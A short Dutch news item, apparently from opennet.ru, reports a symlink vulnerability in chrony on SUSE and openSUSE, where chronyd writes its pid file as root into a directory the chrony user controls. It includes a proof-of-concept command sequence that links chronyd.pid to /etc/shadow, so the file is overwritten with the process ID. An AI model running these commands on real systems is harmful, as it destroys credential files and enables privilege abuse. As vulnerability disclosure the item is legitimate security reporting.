В
Het beveiligingslek wordt veroorzaakt door het onveilig aanmaken van een pid-bestand, dat is gemaakt in een stadium waarin chrony de rechten nog niet had gereset en als root draaide. In dit geval werd de map /run/chrony, waarin het pid-bestand is geschreven, aangemaakt met rechten 0750 via systemd-tmpfiles of toen chronyd werd gestart in samenwerking met de gebruiker en groep “chrony”. Als u dus toegang heeft tot de gebruiker chrony, is het mogelijk om het pid-bestand /run/chrony/chronyd.pid te vervangen door een symbolische link. Een symbolische link kan verwijzen naar elk systeembestand dat wordt overschreven wanneer chronyd wordt gestart.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ uitgang
root# /usr/sbin/chronyd -n
^C
# in plaats van de inhoud van /etc/shadow wordt het chronyd-proces-ID opgeslagen
root# cat /etc/shadow
15287
Kwetsbaarheid
SUSE- en openSUSE-probleem
Bron: opennet.ru